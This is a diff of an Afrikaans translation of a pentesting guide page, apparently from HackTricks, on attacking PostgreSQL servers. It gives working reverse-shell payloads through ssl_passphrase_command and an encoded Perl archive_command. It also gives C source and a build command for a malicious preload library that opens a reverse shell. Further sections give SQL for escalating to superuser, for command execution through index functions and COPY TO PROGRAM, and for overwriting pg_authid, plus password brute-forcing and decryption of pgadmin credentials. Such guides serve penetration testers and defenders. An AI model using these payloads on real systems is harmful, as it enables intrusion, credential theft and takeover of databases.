url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md" %} [rce-with-postgresql-extensions.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md) {% endcontent-ref %} -### PostgreSQL-konfigurasie-lêer RCE +### PostgreSQL konfigurasie lêer RCE +{% hint style="info" %} +Die volgende RCE-vectors is veral nuttig in beperkte SQLi-kontekste, aangesien alle stappe deur geneste SELECT-stellings uitgevoer kan word +{% endhint %} -Die **konfigurasie-lêer** van postgresql is **skryfbaar** deur die **postgres-gebruiker** wat die databasis laat loop, sodat jy as **supergebruiker** lêers in die lêersisteem kan skryf, en dus kan jy **hierdie lêer oorskryf**. +Die **konfigurasie-lêer** van PostgreSQL is **skryfbaar** deur die **postgres-gebruiker**, wat die een is wat die databasis hardloop, sodat jy as **supergebruiker** lêers in die lêersisteem kan skryf, en dus kan jy **hierdie lêer oorskryf.** ![](<../.gitbook/assets/image (303).png>) @@ -631,25 +456,25 @@ Die **konfigurasie-lêer** van postgresql is **skryfbaar** deur die **postgres-g Meer inligting [oor hierdie tegniek hier](https://pulsesecurity.co.nz/articles/postgres-sqli). -Die konfigurasie-lêer het 'n paar interessante eienskappe wat kan lei tot RCE: +Die konfigurasie-lêer het 'n paar interessante eienskappe wat tot RCE kan lei: -* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Pad na die privaatsleutel van die databasis -* `ssl_passphrase_command = ''` As die privaat lêer deur 'n wagwoord beskerm word (gekripteer), sal postgresql die opdrag uitvoer wat in hierdie eienskap aangedui word. -* `ssl_passphrase_command_supports_reload = off` **As** hierdie eienskap **aan** is, sal die **opdrag** uitgevoer word as die sleutel deur 'n wagwoord beskerm word wanneer `pg_reload_conf()` **uitgevoer** word. +- `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Pad na die privaatsleutel van die databasis +- `ssl_passphrase_command = ''` As die privaat lêer deur 'n wagwoord beskerm word (geënkripteer) sal postgresql die opdrag aangedui in hierdie eienskap **uitvoer**. +- `ssl_passphrase_command_supports_reload = off` **Indien** hierdie eienskap **aan** is, sal die **opdrag** uitgevoer word as die sleutel deur 'n wagwoord beskerm word wanneer `pg_reload_conf()` **uitgevoer** word. -Dan sal 'n aanvaller nodig hê om: +Dan sal 'n aanvaller moet: 1. **Dump privaatsleutel** van die bediener -2. **Versleutel** afgelaai privaatsleutel: -1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key` +2. **Enkripteer** afgelaai privaatsleutel: +1. `rsa -aes256 -in afgelaai-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key` 3. **Oorskryf** -4. **Dump** die huidige postgresql-**konfigurasie** -5. **Oorskryf** die **konfigurasie** met die genoemde eienskappe-konfigurasie: +4. **Dump** die huidige postgresql **konfigurasie** +5. **Oorskryf** die **konfigurasie** met die genoemde eienskappekonfigurasie: 1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'` 2. `ssl_passphrase_command_supports_reload = on` 6. Voer `pg_reload_conf()` uit -Tydens die toets van hierdie het ek opgemerk dat dit slegs sal werk as die **privaatsleutel-lêer bevoegdhede 640** het, dit **deur root besit word** en deur die **groep ssl-cert of postgres** (sodat die postgres-gebruiker dit kan lees), en in _/var/lib/postgresql/12/main_ geplaas is. +Tydens toetsing het ek opgemerk dat dit slegs sal werk as die **privaatsleutel-lêer bevoegdhede 640** het, dit **deur root besit word** en deur die **groep ssl-cert of postgres** (sodat die postgres-gebruiker dit kan lees), en in _/var/lib/postgresql/12/main_ geplaas is. #### **RCE met archive\_command** @@ -657,24 +482,86 @@ Tydens die toets van hierdie het ek opgemerk dat dit slegs sal werk as die **pri 'n Ander eienskap in die konfigurasie-lêer wat uitgebuit kan word, is `archive_command`. -Om dit te laat werk, moet die `archive_mode`-instelling `'on'` of `'always'` wees. As dit waar is, kan ons die opdrag in `archive_command` oorskryf en dit dwing om uitgevoer te word via die WAL (write-ahead logging) operasies. +Om dit te laat werk, moet die `archive_mode` instelling `'aan'` of `'altyd'` wees. As dit waar is, kan ons die opdrag in `archive_command` oorskryf en dit dwing om uit te voer via die WAL (write-ahead logging) operasies. Die algemene stappe is: 1. Kontroleer of argiefmodus geaktiveer is: `SELECT current_setting('archive_mode')` -2. Oorskryf `archive_command` met die payload. Byvoorbeeld, 'n omgekeerde dop: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'` -3. Laai die konfigurasie weer: `SELECT pg_reload_conf()` -4. Dwang die WAL-operasie om uit te voer, wat die argiefopdrag sal oproep: `SELECT pg_switch_wal()` of `SELECT pg_switch_xlog()` vir sommige Postgres-weergawes +2. Oorskryf `archive_command` met die lading. Byvoorbeeld, 'n omgekeerde dop: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'` +3. Herlaai die konfigurasie: `SELECT pg_reload_conf()` +4. Dwings die WAL-operasie om uit te voer, wat die argiefopdrag sal aanroep: `SELECT pg_switch_wal()` of `SELECT pg_switch_xlog()` vir sommige Postgres-weergawes +#### **RCE met voorlaai biblioteke** +Meer inligting [oor hierdie tegniek hier](https://adeadfed.com/posts/postgresql-select-only-rce/). + +Hierdie aanvalvektor maak gebruik van die volgende konfigurasie-veranderlikes: +- `session_preload_libraries` -- biblioteke wat deur die PostgreSQL-bedieners by die kliëntverbinding gelaai sal word. +- `dynamic_library_path` -- lys van gids waar die PostgreSQL-bedieners na die biblioteke sal soek. + +Ons kan die `dynamic_library_path`-waarde instel op 'n gids wat deur die `postgres`-gebruiker wat die databasis hardloop, skryfbaar is, byvoorbeeld die `/tmp/`-gids, en 'n skadelike `.so`-voorwerp daar oplaai. Vervolgens sal ons die PostgreSQL-bedieners dwing om ons nuutgelaai biblioteek te laai deur dit in die `session_preload_libraries`-veranderlike in te sluit. + +Die aanvalstappe is: +1. Laai die oorspronklike `postgresql.conf` af +2. Sluit die `/tmp/`-gids in die `dynamic_library_path`-waarde in, byvoorbeeld `dynamic_library_path = '/tmp:$libdir'` +3. Sluit die skadelike biblioteeknaam in die `session_preload_libraries`-waarde in, byvoorbeeld `session_preload_libraries = 'payload.so'` +4. Kontroleer die hoof PostgreSQL-weergawe via die `SELECT version()`-navraag +5. Kompileer die skadelike biblioteekkode met die korrekte PostgreSQL-ontwikkelingspakket +Voorbeeldkode: +```c +#include +#include +#include +#include +#include +#include +#include +#include "postgres.h" +#include "fmgr.h" + +#ifdef PG_MODULE_MAGIC +PG_MODULE_MAGIC; +#endif + +void _init() { +/* +code taken from https://www.revshells.com/ +*/ + +int port = REVSHELL_PORT; +struct sockaddr_in revsockaddr; + +int sockt = socket(AF_INET, SOCK_STREAM, 0); +revsockaddr.sin_family = AF_INET; +revsockaddr.sin_port = htons(port); +revsockaddr.sin_addr.s_addr = inet_addr("REVSHELL_IP"); + +connect(sockt, (struct sockaddr *) &revsockaddr, +sizeof(revsockaddr)); +dup2(sockt, 0); +dup2(sockt, 1); +dup2(sockt, 2); + +char * const argv[] = {"/bin/bash", NULL}; +execve("/bin/bash", argv, NULL); +} +``` +Kompilering van die kode: +```bash +gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c +``` +6. Laai die skadelike `postgresql.conf`, geskep in stappe 2-3, af en oorskryf die oorspronklike een +7. Laai die `payload.so` van stap 5 na die `/tmp`-gids +8. Herlaai die bedienerskonfigurasie deur die bediener te herlaai of die `SELECT pg_reload_conf()`-navraag te roep +9. By die volgende DB-verbinding sal jy die omgekeerde dopverbinding ontvang. ## **Postgres Privesc** ### CREATEROLE Privesc -#### **Grant** +#### **Toekenning** -Volgens die [**dokumentasie**](https://www.postgresql.org/docs/13/sql-grant.html): _Rolle wat die **`CREATEROLE`**-bevoegdheid het, kan **lidmaatskap in enige rol toeken of herroep** wat **nie** 'n **supergebruiker** is nie._ +Volgens die [**dokumentasie**](https://www.postgresql.org/docs/13/sql-grant.html): _Rolle met die **`CREATEROLE`** voorreg kan **lidmaatskap in enige rol toeken of herroep** wat **nie** 'n **supergebruiker** is nie._ -Dus, as jy **`CREATEROLE`** toestemming het, kan jy jouself toegang gee tot ander **rolle** (wat nie supergebruiker is nie) wat jou die opsie kan gee om lêers te lees en skryf en opdragte uit te voer: +Dus, as jy die **`CREATEROLE`** toestemming het, kan jy jouself toegang gee tot ander **rolle** (wat nie supergebruikers is nie) wat jou die opsie kan gee om lêers te lees en skryf en opdragte uit te voer: ```sql # Access to execute commands GRANT pg_execute_server_program TO username; @@ -683,7 +570,7 @@ GRANT pg_read_server_files TO username; # Access to write files GRANT pg_write_server_files TO username; ``` -#### Verander Wagwoord +#### Wysig Wagwoord Gebruikers met hierdie rol kan ook die wagwoorde van ander nie-supergebruikers **verander**: ```sql @@ -692,7 +579,7 @@ ALTER USER user_name WITH PASSWORD 'new_password'; ``` #### Privesc na SUPERUSER -Dit is redelik algemeen om te vind dat **plaaslike gebruikers kan inlog in PostgreSQL sonder om enige wagwoord te verskaf**. Daarom, sodra jy **toestemmings het om kode uit te voer**, kan jy hierdie toestemmings misbruik om die **`SUPERUSER`** rol te verkry: +Dit is redelik algemeen om te vind dat **plaaslike gebruikers kan aanmeld by PostgreSQL sonder om enige wagwoord te verskaf**. Daarom, sodra jy **toestemmings om kode uit te voer** ingesamel het, kan jy hierdie toestemmings misbruik om jou die **`SUPERUSER`** rol te gee: ```sql COPY (select '') to PROGRAM 'psql -U -c "ALTER USER WITH SUPERUSER;"'; ``` @@ -708,15 +595,15 @@ host all all ::1/128 trust ``` {% endhint %} -### **ALTER TABEL privesc** +### **WYSIG TABEL privesc** -In [**hierdie skryfstuk**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) word verduidelik hoe dit moontlik was om **privesc** in Postgres GCP te doen deur misbruik te maak van die ALTER TABEL-voorreg wat aan die gebruiker verleen is. +In [**hierdie skrywe**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) word verduidelik hoe dit moontlik was om **privesc** in Postgres GCP te misbruik deur die ALTER TABLE-voorreg wat aan die gebruiker verleen is. -Wanneer jy probeer om 'n **ander gebruiker eienaar van 'n tabel** te maak, behoort jy 'n **fout** te kry wat dit verhoed, maar blykbaar het GCP daardie **opsie aan die nie-supergebruiker postgres-gebruiker** gegee: +Wanneer jy probeer om **'n ander gebruiker eienaar van 'n tabel te maak**, behoort jy 'n **fout** te kry wat dit voorkom, maar blykbaar het GCP daardie **opsie aan die nie-supergebruiker postgres-gebruiker** in GCP gegee: -
+
-Deur hierdie idee te koppel met die feit dat wanneer die **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html)-opdragte uitgevoer word op 'n **tabel met 'n indeksfunksie**, word die **funksie** as deel van die opdrag **geroep** met die **eienaar se toestemmings**. Dit is moontlik om 'n indeks met 'n funksie te skep en eienaarstoestemmings aan 'n **supergebruiker** oor daardie tabel te gee, en dan ANALYZE uit te voer oor die tabel met die skadelike funksie wat opdragte kan uitvoer omdat dit die voorregte van die eienaar gebruik. +Deur hierdie idee te koppel met die feit dat wanneer die **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) opdragte uitgevoer word op 'n **tabel met 'n indeksfunksie**, word die **funksie** as deel van die opdrag met die **eienaar se toestemmings** geroep. Dit is moontlik om 'n indeks met 'n funksie te skep en eienaarskapstoestemmings aan 'n **supergebruiker** oor daardie tabel te gee, en dan ANALYZE oor die tabel uit te voer met die skadelike funksie wat opdragte kan uitvoer omdat dit die toestemmings van die eienaar gebruik. ```c GetUserIdAndSecContext(&save_userid, &save_sec_context); SetUserIdAndSecContext(onerel->rd_rel->relowner, @@ -725,12 +612,12 @@ save_sec_context | SECURITY_RESTRICTED_OPERATION); #### Uitbuiting 1. Begin deur 'n nuwe tabel te skep. -2. Voeg irrelevante inhoud by die tabel in om data vir die indeksfunksie te voorsien. -3. Ontwikkel 'n skadelike indeksfunksie wat 'n koderingsuitvoerlading bevat, wat die uitvoering van ongemagtigde bevele moontlik maak. -4. ALTER die eienaar van die tabel na "cloudsqladmin," wat GCP se supergebruikersrol is wat uitsluitlik deur Cloud SQL gebruik word om die databasis te bestuur en te onderhou. -5. Voer 'n ANALYZE-operasie op die tabel uit. Hierdie aksie dwing die PostgreSQL-enjin om oor te skakel na die gebruikerskonteks van die tabel se eienaar, "cloudsqladmin." Gevolglik word die skadelike indeksfunksie geroep met die toestemmings van "cloudsqladmin," wat die uitvoering van die voorheen ongemagtigde skilbevel moontlik maak. +2. Voeg 'n paar irrelevante inhoud by die tabel in om data vir die indeksfunksie te voorsien. +3. Ontwikkel 'n skadelike indeksfunksie wat 'n koderingsuitvoeringslading bevat, wat ongemagtigde bevele moontlik maak. +4. WYSIG die eienaar van die tabel na "cloudsqladmin," wat GCP se supergebruikersrol is wat uitsluitlik deur Cloud SQL gebruik word om die databasis te bestuur en te onderhou. +5. Voer 'n ANALYSE-operasie op die tabel uit. Hierdie aksie dwing die PostgreSQL-enjin om na die gebruikerskonteks van die tabel se eienaar, "cloudsqladmin," te skakel. Gevolglik word die skadelike indeksfunksie met die regte van "cloudsqladmin" geroep, wat die uitvoering van die voorheen ongemagtigde skul bevel moontlik maak. -In PostgreSQL lyk hierdie vloei soos volg: +In PostgreSQL lyk hierdie vloei soos dit: ```sql CREATE TABLE temp_table (data text); CREATE TABLE shell_commands_results (data text); @@ -751,13 +638,13 @@ LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ANALYZE public.temp_table; ``` -Dan sal die `shell_commands_results` tabel die uitvoer van die uitgevoerde kode bevat: +Dan sal die `shell_commands_results` tabel die uitset van die uitgevoerde kode bevat: ``` uid=2345(postgres) gid=2345(postgres) groups=2345(postgres) ``` -### Plaaslike Aantekening +### Plaaslike Aanteken -Sommige verkeerd gekonfigureerde postgresql-instanties mag enige plaaslike gebruiker toelaat om aan te teken, dit is moontlik om plaaslik vanaf 127.0.0.1 aan te teken deur die **`dblink`-funksie** te gebruik: +Sommige verkeerd geconfigureerde postgresql-instanties mag dalk die aanteken van enige plaaslike gebruiker toelaat, dit is moontlik om plaaslik vanaf 127.0.0.1 te aanteken met behulp van die **`dblink`-funksie**: ```sql \du * # Get Users \l # Get databases @@ -770,13 +657,13 @@ dbname=somedb', RETURNS (result TEXT); ``` {% hint style="warning" %} -Let daarop dat vir die vorige navraag om te werk, **moet die funksie `dblink` bestaan**. As dit nie bestaan nie, kan jy probeer om dit te skep met +Let daarop dat vir die vorige navraag om te werk **die funksie `dblink` moet bestaan**. As dit nie bestaan nie, kan jy probeer om dit te skep met ```sql CREATE EXTENSION dblink; ``` {% endhint %} -As jy die wagwoord van 'n gebruiker met meer bevoegdhede het, maar die gebruiker mag nie vanaf 'n eksterne IP-adres aanmeld nie, kan jy die volgende funksie gebruik om navrae uit te voer as daardie gebruiker: +As jy die wagwoord van 'n gebruiker met meer voorregte het, maar die gebruiker nie toegelaat word om vanaf 'n eksterne IP-adres in te teken nie, kan jy die volgende funksie gebruik om navrae as daardie gebruiker uit te voer: ```sql SELECT * FROM dblink('host=127.0.0.1 user=someuser @@ -790,7 +677,7 @@ SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2; ``` ### **Aangepaste gedefinieerde funksie met** SECURITY DEFINER -[**In hierdie uiteensetting**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), was pentesters in staat om privesc binne 'n postgres-instansie wat deur IBM voorsien word, omdat hulle **hierdie funksie met die SECURITY DEFINER-vlag gevind het**: +[**In hierdie skryfstuk**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), was pentesters in staat om privesc binne 'n postgres-instansie wat deur IBM voorsien word, omdat hulle **hierdie funksie met die SECURITY DEFINER-vlag gevind het**:
CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
 RETURNS text
@@ -811,7 +698,7 @@ PERFORM dblink_disconnect();
 …
 
-Soos [**verduidelik in die dokumentasie**](https://www.postgresql.org/docs/current/sql-createfunction.html) word 'n funksie met **SECURITY DEFINER uitgevoer** met die voorregte van die **gebruiker wat dit besit**. Daarom, as die funksie **kwesbaar is vir SQL-injeksie** of as dit enige **voorregtehandelinge met parameters wat deur die aanvaller beheer word**, kan dit misbruik word om voorregte binne postgres te **verhoog**. +Soos [**verduidelik in die dokumentasie**](https://www.postgresql.org/docs/current/sql-createfunction.html) word 'n funksie met **SECURITY DEFINER uitgevoer** met die voorregte van die **gebruiker wat dit besit**. Daarom, as die funksie **kwesbaar vir SQL-injeksie is** of as dit enige **bevoorregte aksies met parameters wat deur die aanvaller beheer word**, uitvoer, kan dit misbruik word om **voorregte binne postgres te eskaleer**. In lyn 4 van die vorige kode kan jy sien dat die funksie die **SECURITY DEFINER**-vlag het. ```sql @@ -819,19 +706,38 @@ CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user); ``` -En voer dan **opdragte uit**: +En voer dan **bevele uit**:
### Pas Burteforce toe met PL/pgSQL -**PL/pgSQL** is 'n **volledig uitgeruste programmeringstaal** wat groter prosedurele beheer bied in vergelyking met SQL. Dit maak die gebruik van **lusse** en ander **beheerstrukture** moontlik om programlogika te verbeter. Daarbenewens het **SQL-opdragte** en **treffers** die vermoë om funksies aan te roep wat met die **PL/pgSQL-taal** geskep is. Hierdie integrasie maak 'n meer omvattende en veelsydige benadering tot databasisprogrammering en outomatisering moontlik.\ +**PL/pgSQL** is 'n **volledig uitgeruste programmeringstaal** wat groter prosedurele beheer bied in vergelyking met SQL. Dit maak die gebruik van **lusse** en ander **beheerstrukture** moontlik om programlogika te verbeter. Daarbenewens het **SQL-stellings** en **triggers** die vermoë om funksies aan te roep wat geskep is met die **PL/pgSQL-taal**. Hierdie integrasie maak 'n meer omvattende en veelsydige benadering tot databasisprogrammering en outomatisering moontlik.\ **Jy kan hierdie taal misbruik om PostgreSQL te vra om die gebruikers se geloofsbriewe te burteforce.** {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md" %} [pl-pgsql-password-bruteforce.md](../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md) {% endcontent-ref %} +### Privesc deur die Oorskryf van Interne PostgreSQL-tabelle +{% hint style="info" %} +Die volgende privesc-vektor is veral nuttig in beperkte SQLi-kontekste, aangesien alle stappe deur geneste SELECT-stellings uitgevoer kan word. +{% endhint %} + +As jy **PostgreSQL-bedienerlêers kan lees en skryf**, kan jy **'n supergebruiker word** deur die PostgreSQL op skyf filenode te oorskryf wat verband hou met die interne `pg_authid`-tabel. + +Lees meer oor hierdie tegniek [hier](https://adeadfed.com/posts/updating-postgresql-data-without-update/). + +Die aanvalstappe is: +1. Verkryg die PostgreSQL-data-gids +2. Verkryg 'n relatiewe pad na die filenode wat verband hou met die `pg_authid`-tabel +3. Laai die filenode af deur die `lo_*`-funksies +4. Kry die datatipe wat verband hou met die `pg_authid`-tabel +5. Gebruik die [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) om die filenode te [redigeer](https://adeadfed.com/posts/updating-postgresql-data-without-update/#privesc-updating-pg_authid-table); stel alle `rol*` booleaanse vlae op 1 vir volle regte. +7. Laai die geredigeerde filenode weer op via die `lo_*`-funksies en oorskryf die oorspronklike lêer op die skyf +8. *(Opsioneel)* Maak die in-memory tabelkas leeg deur 'n duur SQL-navraag uit te voer +9. Jy behoort nou die regte van 'n volle superadmin te hê. + ## **POST** ``` msf> use auxiliary/scanner/postgres/postgres_hashdump @@ -840,9 +746,9 @@ msf> use auxiliary/admin/postgres/postgres_readfile msf> use exploit/linux/postgres/postgres_payload msf> use exploit/windows/postgres/postgres_payload ``` -### logboekhouding +### logging -Binne die _**postgresql.conf**_ lêer kan jy postgresql-logboeke aktiveer deur die volgende te verander: +Binne die _**postgresql.conf**_ lêer kan jy postgresql-logboeke aktiveer deur te verander: ```bash log_statement = 'all' log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log' @@ -851,13 +757,13 @@ sudo service postgresql restart #Find the logs in /var/lib/postgresql//main/log/ #or in /var/lib/postgresql//main/pg_log/ ``` -Daarna, **herlaai die diens**. +Dan, **herlaai die diens**. ### pgadmin [pgadmin](https://www.pgadmin.org) is 'n administrasie- en ontwikkelingsplatform vir PostgreSQL.\ -Jy kan **wagwoorde** binne die _**pgadmin4.db**_ lêer vind.\ -Jy kan hulle ontsluit deur die _**decrypt**_ funksie binne die skripsie te gebruik: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py) +Jy kan **wagwoorde** binne die _**pgadmin4.db**_ lêer vind\ +Jy kan hulle ontsluit deur die _**decrypt**_ funksie binne die skriffie te gebruik: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py) ```bash sqlite3 pgadmin4.db ".schema" sqlite3 pgadmin4.db "select * from user;" @@ -866,28 +772,6 @@ string pgadmin4.db ``` ### pg\_hba -Kliëntverifikasie in PostgreSQL word hanteer deur middel van 'n konfigurasie-lêer genaamd **pg_hba.conf**. Hierdie lêer bevat 'n reeks rekords wat elk 'n verbindingskategorie, kliënt-IP-adresreeks (indien van toepassing), databasisnaam, gebruikersnaam en die verifikasiemetode spesifiseer wat gebruik moet word vir ooreenstemmende verbindings. Die eerste rekord wat ooreenstem met die verbindingskategorie, kliëntadres, versoekte databasis en gebruikersnaam, word gebruik vir verifikasie. Daar is geen terugval of rugsteun as verifikasie misluk nie. As geen rekord ooreenstem nie, word toegang geweier. +Kliëntverifikasie in PostgreSQL word bestuur deur 'n konfigurasie lêer genaamd **pg_hba.conf**. Hierdie lêer bevat 'n reeks rekords, elkeen spesifiseer 'n verbindings tipe, klient IP-adres reeks (indien van toepassing), databasis naam, gebruikersnaam, en die verifikasiemetode om te gebruik vir ooreenstemmende verbindings. Die eerste rekord wat ooreenstem met die verbindings tipe, klient adres, versoekte databasis, en gebruikersnaam word gebruik vir verifikasie. Daar is geen terugval of rugsteun as verifikasie misluk nie. As geen rekord ooreenstem nie, word toegang geweier. -Die beskikbare wagwoordgebaseerde verifikasiemetodes in pg_hba.conf is **md5**, **crypt** en **password**. Hierdie metodes verskil in hoe die wagwoord oorgedra word: MD5-gehasht, crypt-gekripteer of duidelike teks. Dit is belangrik om daarop te let dat die crypt-metode nie gebruik kan word met wagwoorde wat in pg_authid gekripteer is nie. - -
- -Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! - -Ander maniere om HackTricks te ondersteun: - -* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) -* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) -* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag. - -
- -
- -\ -Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ -Kry vandag toegang: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +Die beskikbare wagwoord-gebaseerde verifikasiemetodes in pg_hba.conf is **md5**, **crypt**, en **password**. Hierdie metodes verskil in hoe die wagwoord oorgedra word: MD5-gehasht, crypt-versleutel, of teks in duidelike taal. Dit is belangrik om op te let dat die crypt-metode nie gebruik kan word met wagwoorde wat in pg_authid versleutel is.